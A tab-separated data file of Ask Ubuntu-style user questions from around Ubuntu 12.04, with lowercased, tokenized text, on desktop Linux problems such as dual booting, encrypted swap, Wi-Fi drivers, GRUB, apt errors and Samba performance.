194453	install themes on kubuntu	i just installed the package kubuntu-desktop and i found some really good themes online : http : //kubuntu-art.org/content/show.php/ice+cream+theme+ % 28qtcurve % 2cemerald % 2cchrome % 29 ? content=151493 http : //kubuntu-art.org/content/show.php/elementary+for+kde+ % 28qtcurve+ % 2b+emerald % 29 ? content=152404 can anybody tell me how to install those themes on ( k ) ubuntu 12.04 ? thanks in advance
194457	installing ubuntu os on ssd and install home on other hdd	i have a ssd with `` only '' 128gb . i already have windows 7 and some apps installed on it . i want to install ubuntu on it as well , but i only want to install the system files and apps on the ssd and have my home folder ( downloads , music etc . ) on my hdd . i do the exact same thing in windows 7 , but can i do this with ubuntu ?
194459	12.04 : i need a new network card - and i think this one may work ?	i found this list of compatible usb wireless network adaptors : linux usb wireless compatibility adapter list listed here is the belkin f5d8053 . i 'm looking for a store to buy a suitable adaptor in locally and i ca n't find that particular adaptor - but i can see a belkin f7d4101az . i think this is simply a newer model - but a google search for `` ubuntu belkin f7d4101az '' brings no results - not even people trying to get it to work . nothing . so i did n't want to purchase it without being sure . there 's really only one pc shop that sells this sort of stuff around here - so here 's a list of all my available options : criteria i 'd really like to get one today , because i have a lot of work to do and do n't really want to have to wait a week for a new adaptor - i spent 6 or 7 hours last night trying to get my dell 1450 to work with no luck . any help would be much appreciated .
194471	how can a frozen/locked-up program/app be closed ?	i am using ubuntu 12.04.1 lts desktop . my son and i are playing games on gcompris and several modules freeze/lockup . when it does , i do n't know how to close the program . i know in windows i could use ctrl-alt-del to get to the task manager to shut it down . is there an equivalent to this in ubuntu ?
194474	no swap space . encrypted swap in crypttab not created	today i discovered that my ubuntu 12.04lts does n't have any swap-space . i installed this system from scratch only some weeks ago . i encrypted all the partitions to me needs . i did n't install any swap space in the first place , cause the installation dialog misbehaved when i tried to set up the encrypted swap . i added the encrypted swap-space after finishing the installation by editing /etc/crypttab and /etc/fstab . i might issued some more commands to propagate the changes ( i do n't remember ) . the swap-space used to just work fine after that . today i discovered for coincidence that i do n't have any swap available . there are no error messages . some system information : ( swap is supposed to be on sdb1_crypt ) /etc/crypttab : sda1_crypt uuid=91cb1de3-0754-4aa3-89b9-807e9a95a55a /root/keyfiletohome luks sdb1_crypt uuid=96558522-6c79-4ddc-8f93-7defee6a9255 /dev/urandom cipher=aes-cbc-essiv : sha256 , hash=ripemd160 , size=256 , swap sdb2_crypt uuid=5fd25f3a-de63-4a5d-94a7-3e509a70b68c none luks /etc/fstab : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 /dev/mapper/sdb2_crypt / ext4 errors=remount-ro 0 1 # /boot used to be on /dev/sdb3 during installation uuid=9cdce42f-3894-4878-af03-12284dd5cab9 /boot ext4 defaults 0 2 /dev/mapper/sda1_crypt /home ext4 defaults 0 2 /dev/mapper/sdb1_crypt none swap sw 0 0 $ ll /dev/mapper shows me , that sdb1_crypt is actually not created : total 0 drwxr-xr-x 2 root root 120 sep 29 16:26 ./ drwxr-xr-x 16 root root 4460 sep 29 16:26 ../ crw -- -- -- - 1 root root 10 , 236 sep 29 16:24 control lrwxrwxrwx 1 root root 7 sep 29 16:24 sda1_crypt - > ../dm-1 lrwxrwxrwx 1 root root 7 sep 29 16:24 sdb2_crypt - > ../dm-0 therefor /proc/swaps is empty of course : filename type size used priority i tried to update the initramfs : # update-initramfs -u that did n't help . i am able to turn on the swap space temporarily by running the following commands : # cryptsetup -d /dev/urandom create sdb1_crypt /dev/disk/by-uuid/96558522-6c79-4ddc-8f93-7defee6a9255 # mkswap /dev/mapper/sdb1_crypt # swapon -a i tried to add the output from dmesg here . i got an error message that the body of the message is too long . if it could be helpful , please ask for specific sections of the dmesg output . what causes the problem ? how can i fix it ? how can i get the swap space work as usual again ? any help appreciated .
194475	slow gvfs samba performance	if i use/acces a samba share using nautilus or manually using `` gvfs-mount smb : //server-ip/share '' i get a poor performance , only about 7 mb/s on my 100 mbit network . if i access the same share on windows i get fullspeed 100 mbit ( about 11 mb/s ) , also if i mount using sudo mount -t cifs //server-ip/share /mountpount which uses cifs instead of gvfs i get fullspeed too , so can anyone tell me if there is a performance problem/bug in gvfs or how gvfs is using smb shares differerently ? i tested read perfomance ( from my network samba share ) with multiples files and always , the cifs-version is fullspeed and the gvfs-version has some mb/s less . after some research i found some tips to optimize the samba settings of my ubuntu installation and some network tuning tips , but as the cifs mounted share gets the full network speed i do n't believe its that kind of problem .
194479	change desktop area used by maximized windows	right now i have an embedded terminal that occupies the bottom 100 or so pixels of my screen . this is super convenient for me , but unfortunately , whenever i maximize a window , it of course covers up the terminal . is there any way to make an application when it maximizes , to only take up the desktop area that does not include the very bottom of the screen where the terminal is ? also , it would be very nice to prevent any window , even those not maximized from entering this part of the screen . if anyone knows how to make this happen , i would greatly appreciate it .
194480	can i install ubuntu on the same drive as windows ?	i 'm trying to install ubuntu 12.4.1 on by desktop but on the same drive on which i have already installed windows using windows installer of ubuntu . so i want to ensure that it wo n't harm my existing operating system and the associated files .
194484	can not install update and software	can not install update and software . whenever i try to do so error comes with- '' requires installation of untrusted packages the action would require the installation of packages from not authenticated sources . and the installation gets stop .
194491	how to change back to xserver-xorg-video-nouveau ?	i try to install gt 630m driver -- nvidia-linux-x86_64-304.51.run and nvidia-current , but they decrease the resolution . that means it failed to run the driver just installed , and also stop the beginning one . how to change back to xserver-xorg-video-nouveau or how to install the correct driver ? i search for two posts but i ca n't find the answer : how to install gt630m driver on ubuntu 12.04 ? nvidia geforce gt630m/gt640m/gt650m graphics card support ? thank you~
194493	why does the installer say i do n't have enough drive space on a new drive ?	i have a problem with ubuntu 12.04 lts . i am trying to install it on a new ( bare ) hard drive and ca n't get past the first screen ( the one that says `` for best results , please ensure that this computer : has at least 4.4 gb available drive space '' ) . there is a big x by that but i know there is plenty of drive space , it is a 1 tb hard drive and has nothing on it . has anyone else had this problem ? it had gone past that before , up to the part where it was supposedly creating the ext 4 file system -- after about 15 minutes or so it would get a black screen and nothing else happened . i am stumped .
194498	are there any plans to integrate web apps to the software center ?	web apps can now integrate with ubuntu . it would be quite neat to add web apps to the software center . for example if someone searches for a chat application in the software center it would be nice to also offer web app chat clients . does the ubuntu team plan to do so ? if yes , in the near future ?
194500	image analysis software	i plan to install ubuntu on a pandaboard/beagleboard in an industrial machine to assure the quality control of the products before they are processed by the machine . so the idea is to connect a screen to the board , and an usb camera . take a picture , compare the picture of the current product with the `` reference '' picture and if it 's not the same , display a alert on the screen to inform the operator of the non-conformity of the products . my question is : which open source software/library could assist me in the analysis of the taken picture with fine-grain control of different parameters ( color , gray level , brightness ... etc ) ? thank you . ps : it will be a desktop edition of ubuntu in order to display the message on the screen , and let the operator interact with the automate ( touch-screen ) .
194501	instruct ubuntu to boot to ram from flash drive using unetbootin	i have used unetbootin to create an installable / live bootable flash drive from ubuntu 12.04 . however that did n't preserve the normal ubuntu boot menu which allows to me to enter advanced options . it has a custom menu that i can pick from predefined choices like `` install ubuntu '' and `` try ubuntu without installing '' . what i would like is to be able to boot from the usb flash drive , but then be able to remove it from the computer once the desktop has loaded . the laptop i would like to use this on does not have an optical ( cd/dvd ) drive - nor do i have a usb version available . what do i need to modify on the flash drive to add an option to `` try ubuntu ( ram ) '' that passes the toram=yes parameter to the initrd options ? are their other things i need to touch/change as well ? is it even possible ? i am not restricted to version 12.04 if that makes a difference . bonus : i would guess the answer would also allow for other options like acpi=off as well , but if it is different i would appreciate having that answer too .
194503	how to format a usb drive in zfs under ubuntu precise ( 12.04 ) ( 32bit )	i am running ubuntu precise 32 bits : $ uname -a linux thorin 3.2.0-30-generic-pae # 48-ubuntu smp fri aug 24 17:14:09 utc 2012 i686 athlon i386 gnu/linux what is the command line to format an external usb hdd in zfs ? ( i am not interested in multi-disk pools for the moment ) . is it advisable to use zfs with a 32-bit kernel ? ( the instructions on zfs on linux call for a 64-bit kernel but ubuntu precise has a recommended 32-bit kernel ) .
194506	can i create an ubuntu one account without downloading ubuntu one ?	i would like to use ubuntu one with thunderbird filelink . is it possible to create an ubuntu one account without downloading the ubuntu one software ?
194508	ubuntu grub restore ( 12.04 lts )	i reinstalled windows 7 , but i lost the grub loader . is there anyway i can access my ubuntu partition again ?
194509	diagnoses live os	i was wondering if there is a live ubuntu or linux in general os built for running hardware and software diagnostics no matter what condition the hardware is in .
194510	how to edit label of usb drive ?	how to edit label of usb drive easily without formatting it ? i tried right clicking the device and go to the properties but can not find anything to edit .
194514	after upgrade to 12.04 wireless keeps dropping on bcm4312	i know there are plenty of questions very similar to these , but i 've tried practically everything and it still is n't working . some solutions get the wireless connection working , but it goes very slow and drops after a few minutes . then it wo n't reconnect and keeps asking for password . hope you can help me . thanks in advance . this is the output for sudo lshw -c network *-network description : network controller product : bcm4312 802.11b/g lp-phy vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:02:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=b43-pci-bridge latency=0 resources : irq:18 memory : f0300000-f0303fff *-network description : ethernet interface product : ar8132 fast ethernet vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:05:00.0 logical name : eth1 version : c0 serial : 00:23:5a:9b:6e : b1 size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vpd bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=atl1c driverversion=1.0.1.0-napi duplex=full firmware=n/a ip=192.168.0.106 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:42 memory : f0200000-f023ffff ioport : a000 ( size=128 ) *-network description : wireless interface physical id : 1 logical name : wlan0 serial : 00:24:2c:83 : f0:81 capabilities : ethernet physical wireless configuration : broadcast=yes driver=b43 driverversion=3.2.0-30-generic firmware=478.104 link=no multicast=yes wireless=ieee 802.11bg and for lsmod | grep b43 b43 342643 0 mac80211 436455 1 b43 cfg80211 178679 2 b43 , mac80211 bcma 25651 1 b43 ssb 50691 1 b43 and for rfkill list 5 : phy0 : wireless lan soft blocked : no hard blocked : no
194515	why is the unity launcher not revealing ?	i set the launcher to auto-hide in ccsm and then changed reveal pressure to 1 . when i move my mouse to the left side of the screen , nothing happens . there is not even a shadow along the left side of the screen when i move my mouse there . how can i fix it ? i have to go into ccsm and change the launcher to `` never '' hide , to bring the launcher back .
194519	i have lost a 30gb folder	i was using a video player running a movie . the player ( movie player that is coming by default on ubuntu ) was freezing and the file and others files in the same folder ( 30 gb ) was missing . still having the same free space that mean for me there is not erased the folder . also now is missing another folder , that happened using avidemux . itâ´s have to be some where . but where is my folder ? is any way somebody help me please . thanks a lot
194520	how can i create a startup script that starts various rails-required programs ?	when i start my ubuntu 12.04 vmware vm , i open up terminal and run the following commands . sudo /etc/init.d/postgresql start sudo /etc/init.d/apache2 start cd sites/name_of_rails_app bundle exec rake sunspot : solr : start bundle exec rake sunspot : solr : start rails_env=test rails s and the rails server then starts in that terminal window . is there a way to automate all or most of this process ? everything but the rails s in a terminal , perhaps ? i 've looked at startup applications , and my postgresql command ( including 'sudo ' ) is in there , but i still have to manually start the postgresql server , so i 'm not sure how/if that tool works . thanks !
194522	ubuntu 12.10 hotkeys not working properly	a couple of weeks ago , i ran a distribution upgrade from 12.04 to 12.10 . unfortunately , something has seemed to happen with the hotkeys on the system . at first , i thought that maybe this was just a glitch with the global hotkeys . that did n't turn out to be the case , as the custom hotkey i added into the ubuntu settings works for my editor . the only default hotkey that seems to have a problem launching is ctrl+alt+t ( terminal ) . this was n't such a big issue to begin with , because i can always just drag the terminal to my launcher and launch it from there . however , i was on chrome earlier and tried to do shift+ctrl+del to clear the history and it failed . i then tried to do shift+esc , just to see if the hotkey for the task manager would work.. and it did . i also thought it could be something with the `` ctrl '' key , since shift+esc works , but shift+ctrl+del does n't . that did n't turn out to be the case either , as keys like ctrl+alt+del ( logout ) work perfectly fine . not quite sure how to go about this , and i have n't found any errors in any of /var/log that raises any suspicion .
194523	how do i install gnu readline ?	basically as per question . i have the .tar.gz file but i ca n't seem to install it . i did the whole , './configure ' , 'make ' and 'make install ' but it did n't work .
194525	does redshift need an active internet connection to work ?	it seems redshift does n't run without an active internet connection . if so , is there some way it could be run when there 's no connection to the internet ?
194528	right click on lenovo u410 not working in 12.04	i managed to install ubuntu 12.04 on the lenovo ideapad u410 , however the right-click is not working out of the box . to be more specific , instead of working as a right click it works like a normal left click . i did already find a solution for the lenovo u310 by creating a 51-synaptics.conf file in /etc/x11/xorg.conf.d which looks as follows : section `` inputclass '' identifier `` default clickpad buttons '' matchdriver `` synaptics '' option `` softbuttonareas '' `` 50 % 0 82 % 0 0 0 0 0 '' option `` lockeddrags '' `` 1 '' option `` bottomedge '' `` 4000 '' option `` areabottomedge '' `` 4445 '' endsection the solution has been found over at the ubuntuforums using that code however led to the right-click working only when clicking the touchpad at a very specific spot which was too small to hit reliably . i am fairly sure that the config file merely needs a little tweaking , however i have no idea on what to do , so any suggestions or solutions would be greatly appreciated . thanks in advance !
194533	prevent encfs reverse mode from including other filesystems ?	i would like to use encfs to encrypt a copy of / for a backup by using the reverse option and then running my backup tool on the virtual , encrypted filesystem . whenever i back up through other tools ( rsync for example ) , they have an option to not cross filesystem boundaries . is there an equivalent option in encfs ? or would such attributes pass through to the encrypted version , and i should just run my backup tool with the one filesystem option ?
194537	problems installing on pentium 4	i 'm trying to load ubuntu onto an old pentium 4 pc . the boot disk is good . i 've checked the memory and all is ok . i run from the boot disk fine . get the menu and select install and then i sit and look at a purple screen with 12.04.04 and 4 dots changing colour in its centre for hours . i never get to the 'prepare disk ' options tab . any ideas ?
194538	measure amount of traffic in ubuntu in gbs ?	my university internet connections such as eduroam and aalto open are extremely poor so i use prepaid-services , less lag . now i may run out of prepaid time so how can i measure the amount of traffic consumed in ubuntu ? i am actually using debian but probably no difference in traffic -monitoring .
194540	mac filtering after dhcp	how to manage filtering by mac in ubuntu ? scenario : ubuntu dhcp is configured and working ( network 192.168.1.0 ) a ) laptop 1 is set in configuration on ubuntu as static ip laptop 1 is configured for automatic ip and when is connected to server everything works . i 'm taking laptop 2 which is configured as static ip 192.168.1.10 and his configuration is not set in ubuntu dhcpd.conf after laptop 2 is connected internet working . it is possible to do mac filtering which disallow to connect pcs with address ip set as static but mac address is not configured in ubuntu ( something like : intruder in network ) ?
194543	why does running `time` and `/usr/bin/time` give different results ?	why does running time and /usr/bin/time give different results ? /usr/bin/time thomas @ tbdesktop : ~ $ /usr/bin/time -f `` elapsed time : % e '' wc /etc/hosts 9 25 224 /etc/hosts elapsed time:0:00.04 time thomas @ tbdesktop : ~ $ time -f `` elapsed time : % e '' wc /etc/hosts -f : command not found real 0m0.079s user 0m0.052s sys 0m0.024s my path is as follows . as far as i can see , there is only one time executable in the path . thomas @ tbdesktop : ~ $ echo $ path /usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games thomas @ tbdesktop : ~ $ find / -name time 2 > /dev/null /sys/devices/pnp0/00:03/rtc/rtc0/time /sys/module/printk/parameters/time /var/lib/dkms/virtualbox/4.1.12/build/common/time /var/lib/doc-base/documents/time /usr/src/linux-headers-3.2.0-30/kernel/time /usr/src/linux-headers-3.2.0-31-generic/include/config/sr/report/time /usr/src/linux-headers-3.2.0-31-generic/include/config/generic/time /usr/src/linux-headers-3.2.0-31-generic/kernel/time /usr/src/virtualbox-4.1.12/common/time /usr/src/linux-headers-3.2.0-29/kernel/time /usr/src/linux-headers-3.2.0-30-generic/include/config/sr/report/time /usr/src/linux-headers-3.2.0-30-generic/include/config/generic/time /usr/src/linux-headers-3.2.0-30-generic/kernel/time /usr/src/linux-headers-3.2.0-29-generic/include/config/sr/report/time /usr/src/linux-headers-3.2.0-29-generic/include/config/generic/time /usr/src/linux-headers-3.2.0-29-generic/kernel/time /usr/src/linux-headers-3.2.0-31/kernel/time /usr/bin/time /usr/share/doc/time /usr/share/doc-base/time thomas @ tbdesktop : ~ $
194545	how to get adobe flash fullscreen video fluid with an atom processor ?	my system has an atom n270 + intel i915 graphic card . under windows i can enjoy 720p bigbuckbunny youtube video fullscreen without any trouble . under ubuntu 12.04 i have laggy and choppy fullscreen video and choppy video when not fullscreen . i 've seen that under ubuntu the cpu is almost always at 100 % use . what i must do in order to have videos playing well under ubuntu ? i 've already tried the following : force flash gpu detection : ( no result ) : mkdir /etc/adobe echo `` overridegpuvalidation = 1 '' | sudo tee -a /etc/adobe/mms.cfg grub options ( had results but not enough ) : i915_enable_rc6=1 i915_enable_fbc=1 i915_lvds_downclock=1 pcie_aspm=force updated intel drivers ( glasen ppa ) using chrome instead of firefox ( had impact but not enough )
194546	trying to dual boot 12.04 on mac from dvd but refit only gives `` boot from osx '' option . how to fix ?	i 'm trying to dual boot ubuntu 12.04 on my macbook ( which is a mid 2007 model with intel core 2 dual and currently running lion ) . i 've burned the ubuntu desktop iso file to a 4.7gb dvd , installed refit , and partitioned my hard disk to make room for ubuntu , but when i put in the dvd and then reboot , the refit menu shows only the `` boot from mac os x '' option instead of asking me whether to boot from cd . holding down the key `` c '' or the option key does n't help either . could you explain how to fix this problem and get the laptop to boot from the dvd properly ?
194547	info on installing	i was thinking of installing ubuntu on one of my computers for a test run to see how i like it , but the problem i face is that the one computer i wish to install it on is n't network ready . there 's no network card installed and i keep that computer as a safe computer away from any network connections . the question i have is that is there an iso i could download that contains all the necessary files for upgrading it to current , similar to the way one would download and install windows services packs offline ? i realize the convenience of doing this online , but what would one do if they do n't have an internet connection
194549	using usb as bootable disk but not showing any `` install from using usb '' option	i 'm trying to install ubuntu 12.04 using usb pendrive . i have made usb bootable . setup starts but it 's not showing `` install from usb '' option . it shows only `` install ubuntu '' .
194552	which xfce4-window theme is this ?	i found this image on the xfce4-slideshow but i cant find it in my xfce . what is the name of this theme ?
194557	why am i getting an error syntaxerror : invalid syntax	this is a python code for which i am getting an error ... from scipy import * from matplotlib.pyplot import * x=arange ( 0.1,100,0.1 ) f=zeros ( len ( x ) ) s=-1 for n in range ( 1,10000 ) : t=s*x/ ( x*x+n*n ) f +=t s =-s if max ( abs ( t ) ) < 1e-4 break for xx in c_ [ x , f ] : print `` % f % f '' % ( xx [ 0 ] , xx [ 1 ] )
194560	how do i make my monitors show up as two separate monitors ? - nvidia geforce gtx 550 ti	i 've got a dual-monitor setup , with the monitors configured through the `` nvidia x server settings '' application . in the ubuntu display settings , the monitors show up as one extra-wide monitor labelled `` laptop '' . until now , this really has n't been a problem , but now i 'm trying to set up a wacom tablet . the ubuntu tablet settings allow the tablet to be mapped to a specific monitor , but since the os `` thinks '' that i have only one monitor , i can only map the tablet to both of them . this is a problem . is there any way to have ubuntu recognize the monitors separately ?
194564	unity launch mode choice	you know , when to install a fresh ubuntu 12.04 and there a dash with unity launch mode , which do you have to a hide , or nope , right ? anyone know how to command this for intelligent like a docky , that i want one , but i find that unity 2d do have one , but why not unity 3d have nothing ?
194574	how do i create a private ppa server ?	i am in a research and a step of it is to create a ppa to add academic files . due the very low speed internet and the impossibility of transforming ppas hosted in launchpad into public , it must be hosted in the local server . i have tried to follow a tutorial from 2009 , but no success . can someone help me on it ?
194575	how to highlight items on desktop using xfce ?	im using xfce but the text of the symbols on my desktop are not underlined by a colour , which means i can rarely see them ( black on dark-blue ) . - > like home and trash how to enable the background of the text ?
194580	error message when starting update : failed to load the package list	message says : failed to load the package list this is a serious problem . try again later . if this problem appears again , please report an error to the developers . click details , which says : e : type 'http : //ppa.launchpad.net/madman2k/ubuntu ' is not known on line 61 in source list /etc/apt/sources.list tried this solution : sudo rm /var/lib/apt/lists/* -vf sudo apt-get update however , when entering the first command , it hits back an error : rm : can not remove `/var/lib/apt/lists ' : is a directory some people are suggesting that i change settings in the update manager . i unfortunately ca n't , since the update manager closes each time i get the error . any other way to remove that package ?
194585	difference between using `add-apt-repository` and adding a link to the sources.list	from a user 's point of view , they seem equivalent . some programs can be installed via apt-get install after adding a link to the sources.list . others have to be installed by adding a ppa though command line , and as far as i can see , this method does n't create an entry in the sources.list . so there must be a technical difference ? and , if at all , what is the difference between a ppa and a repository ?
194587	added a bridge for vm guest , now the host ca n't access the internet	i 've installed kvm and set up bridged networking as per the instructions in this user guide . the guest on the vm seems to be working fine . i can ssh into it and it can ping the outside world . but now the host machine no longer has internet access . the network manager was reporting that the wired device was not managed . i found this thread describing why it was showing up as not managed and giving instructions on how to make it managed again . network manager says `` device not managed '' so now the wired connection is managed and the network manager even says that it is connected but it does n't actually have access to the internet .
194595	how to enable my wifi in dell vostro 1500 ?	my wifi is off but the connection with cable is okay . how to resolve this problem ? i am using 12.04 with windows 7 .
194596	webcam error crashes install before generic avatar can be selected , installing with secondary screen - primary broken	i am attempting to install ubuntu 12.04.1 lts on a sony vaio laptop , the laptop 's primary screen is non-functional . i run into a problem on the screen following the creation of a username/password . it appears to want me to select an avatar . i get an error relating to the webcam it seems when i look in the /var/log/syslogs . i am able to boot from the disc no problem . i have seen several suggestions here and elsewhere to use the alternate installer . it appears that the alternate installer does not load up the drivers for secondary monitors , so i am unable to see if any progress is being made or not . is there a link that contains the steps that the alternate installer goes through ? or a way to get that installer to load the second screen as well ? it looks like this bug : https : //bugs.launchpad.net/ubuntu/+source/ubiquity/+bug/1021449
194603	how do i get rid of opendns ?	some months ago i set up opendns . since then , occasionally i get slow page loads and pages that redirect to a timed-out opendns page . i would like to see if removing opendns will make browsing efficient again . however , i ca n't remember how i set it up , nor can i see where opendns is configured . the guides for setting up opendns mention either the file /etc/dhcp/dhclient.conf or using the network manager . the conf file has no reference to opendns or its ip . the network manager does n't have the opendns ip either . but i know it is configured somewhere because of the redirects mentioned above , and because https : //www.opendns.com/welcome/ reports success . how do i determine where it is configured ?
194604	music player with audiobook support	hello i 'm looking for a nice audio player with audio-book and network support . i know banshee has that but i rather use something that is n't coded in mono . another no no is kde programs , qt is fine but not a program that was especially developed for kde like amarok . i 've looked at a couple like clementine , guayadeque , audacious and so on , but no one besides banshee seams to have audio-book support . any suggestions ?
194605	can i get back data after setting up root to iscsi device ?	i tried to setup iscsi target and defined root partition as target ( that was wrong i know ) . i did n't format the iscsi device ; is it possible to get back the data from this partition ? system does not boot at the moment .
194612	installing ubuntu 64bit on acer netbook causes black screen .	trying to install ubuntu on an external usb 3 500 gb hard-drive . i am using acer netbook . my specs are : amd c-60 1ghz with 4 gb ram . i have a 64 bits windows 7 no2 installed . i downloaded `` ubuntu-12.04.1-alternate-amd64 '' iso file and used the universal usb installer to install ubuntu . when i reboot on the external hard drive , i have the language selection , then the menu ... i choose to install ... and i get a black flickering screen . and nothing more . any suggestion ?
194615	should i compile kernel for i7 ?	is there a noticeable benefit in compiling for an intel i7 processor ? or am i fine sticking with the install kernel . if there are brnefits , please elaborate .
194616	how to reset darktable	i need a way of reseting darktable to its factory settings . with shotwell it is simply a case of deleting the home directory for shotwell , but there does n't appear to be one for dt under the darktable name .
194617	lugaru hd - sound problems	i had purchased lugaru hd via one of the humble bundle deals , but have only just tried to play it . it comes as .bin which can be run ( after changing the permissions of the file to allow executing file as program ) in the terminal , to install the game . graphically the game runs smoothly , however there is no sound . . a google search comes up with several solutions suggesting to run the game each time via the terminal command : padsp /home/username/lugaru/lugaru or pasuspender /home/username/lugaru/lugaru which plays sound ... but horrifically crackly .
194621	how do i install windows xp from ubuntu live pen drive ?	i 've tried to install windows xp in my mom 's netbook , the problem is best described here . in the comments someone says that i can format the hdd with a pendrive of ubuntu , and then reformat the hdd with another pendrive with windwos xp , the thing is : i do n't want to format the hdd unless it works , is there any way to install windows xp from a pendrive ubuntu live ? ?
194623	what is an `` integration script '' and why would i want one ?	when i navigate to launchpad in firefox , a pop-up appears : i think , despite its failure to form a coherent question , it 's trying to ask me if i want to install an `` integration script '' called `` unity-webapps-launchpad '' . sadly , it does not provide me with enough information to make an informed decision , nor does it refer me to a source where i can learn more about it . the top result in my web searches on the topic is my own bug report . while this cyclical phenomenon provides a brief source of amusement , it is ultimately unhelpful . so , once again , i 've come to ask ubuntu for a nudge in the right direction . what is this thing ?
194632	how do i delay upstart 's net-device-up signal until a condition is met ?	i need to wait for a specific condition to be met a network interface is considered `` up '' . upstart is sending its net-device-up signal before this condition is met , which cases the scripts that depend on this condition to fail . how do i delay upstart 's net-device-up signal until a condition is met ?
194639	problem with heekscad	i can not make it work , i have no more ideas . please , can anyone tell me if there is another 3d cad similar to heekscad ? every .deb of heekscad are broken , i downloaded the code , and it is missing some archives and/or the script to install it . if anyone can help me i will appreciate it .
194640	kubuntu 12.04 , need a light weight mp3 player	looking for a decent light weight mp3 player that has a graphic equalizer built in a loudness equalization feature thanks
194641	installing ubuntu one on windows 7 ( 64 bit home ) hangs after opening two small windows	after downloading the windows 7 install file for ubuntu one ( 3.0.2b ) , i click on the file . it immediately opens two small windows ( the console and the ubuntu one installer window ) and does nothing else . the console has one line at the top : `` ( downloads ) 1 % '' . i have waited for 30 minutes ( while doing other things ) , but nothing proceeds . any ideas ?
194642	which command is linux 's netview ?	in windows , i can use netview to see all the computers on the lan network , but what 's the corresponding command on linux ?
194643	can not change user accounts settings	i recently changed the name of the administrator and turned off passwords then clicked lock . after some time , i decided to add a password so i clicked on unlock and it 's prompting me to enter a password . i tried typing the old password and it did n't accepted it . i also tried to set password and keys as `` set to default '' but still nothing happened . now i 'm stuck and ca n't get to change the administrator settings . i did my research but nothing seems to work . please help .
194644	boot-up hangs unless i manually select the kernel in the bootloader	in my stock ubuntu install ( forgot which critter its named for , about one year old ) , i am able to boot up normally only if i manually select the kernel in the bootloader ( grub ) . if i step away and it boots from the default , the system will hang with the word `` ubuntu '' on a graphics screen and a few white/red blinking dots beneath it . uname -a linux digdug 2.6.32-42-generic # 95-ubuntu smp wed jul 25 15:57:54 utc 2012 i686 gnu/linux synaptics says i have 'grub-pc ' version 1.98-1ubuntu-13 installed . my grub.cfg does have default= '' 0 '' which i would expect to make the default be the first kernel shown in the selection screen . the system is a laptop with an i7 processor , and i have had trouble with some kernels not being able to boot at all in the past , and power management is not working perfectly , but i have not had problems booting the latest kernel ( 2.6.32-42 ) if i select it manually in grub . any idea what is going on here and how can i fix it so that i can re-boot unattended ? edit grub.cfg is on pastebin . and so is /etc/default/grub . edit 2 based on sly 's advice , i tried mb @ digdug : ~ $ sudo grub-mkconfig -o ./test.grub.cfg generating grub.cfg ... found linux image : /boot/vmlinuz-2.6.32-42-generic found initrd image : /boot/initrd.img-2.6.32-42-generic found linux image : /boot/vmlinuz-2.6.32-41-generic found initrd image : /boot/initrd.img-2.6.32-41-generic found linux image : /boot/vmlinuz-2.6.32-40-generic found initrd image : /boot/initrd.img-2.6.32-40-generic found linux image : /boot/vmlinuz-2.6.32-39-generic found initrd image : /boot/initrd.img-2.6.32-39-generic found linux image : /boot/vmlinuz-2.6.32-28-generic found initrd image : /boot/initrd.img-2.6.32-28-generic found linux image : /boot/vmlinuz-2.6.32-24-generic found initrd image : /boot/initrd.img-2.6.32-24-generic found memtest86+ image : /boot/memtest86+.bin found windows 7 ( loader ) on /dev/sda1 found windows 7 ( loader ) on /dev/sda2 found windows vista ( loader ) on /dev/sda4 done mb @ digdug : ~ $ diff /boot/grub/grub.cfg test.grub.cfg mb @ digdug : ~ $ indicating , afaict , that grub-mkconfig has precisely reproduced my existing grub.cfg . is it possible that init somehow knows i 've booted by default and has triggered some long disk tests or something that are making me think the boot is hung ?
194646	streaming desktop to webcam with avconv	i 'm trying to use avconv to capture my desktop and stream it on my webcam . unfortunately i do not know what output format i should use to do this . the following is what i currently have . avconv -f x11grab -s 1920x1080 -r 30 -i :0.0+0,0 can someone point me in the right direction ? thanks
194651	why use apt-get upgrade instead of apt-get dist-upgrade ?	i usually use apt-get update & & apt-get upgrade to run my updates and upgrades instead of the gui because it seems to run more quickly . however , i 've noticed lately that i often get a message that one of my upgrades was held back . i then usually run dist-upgrade to run it through and it works fine . as far as i can tell after reading this question and its answers , dist-upgrade does all the same things and then some . so , my question is : why use apt-get upgrade at all ? why not use apt-get dist-upgrade all the time ? why does apt-get upgrade even exist ?
194656	it appears you are running a x server nvidia drivers 304.02 ubuntu 12.04	so i went to nvidia 's site and i saw they had a version with a lot of bug fixes . http : //www.geforce.com/drivers/results/49073 and i downloaded it , i ran the .run file rooted . it keeps saying `` it appears you are running a x server '' i do n't have any current nvidia driver installed , i tried the nvidia x-config thing but that did n't work . it just says it ca n't be found . should i wait until that version gets on ubuntu 's software center ? i do n't feel like installing their old and bad version of the drivers .
194658	create an icon in dash panel ?	i wonder how to create an icon on dash panel on the left side of the desktop , to run the following combination of two commands killall nautilus ubuntu_menuproxy= nautilus my ubuntu is 12.04 . thanks !
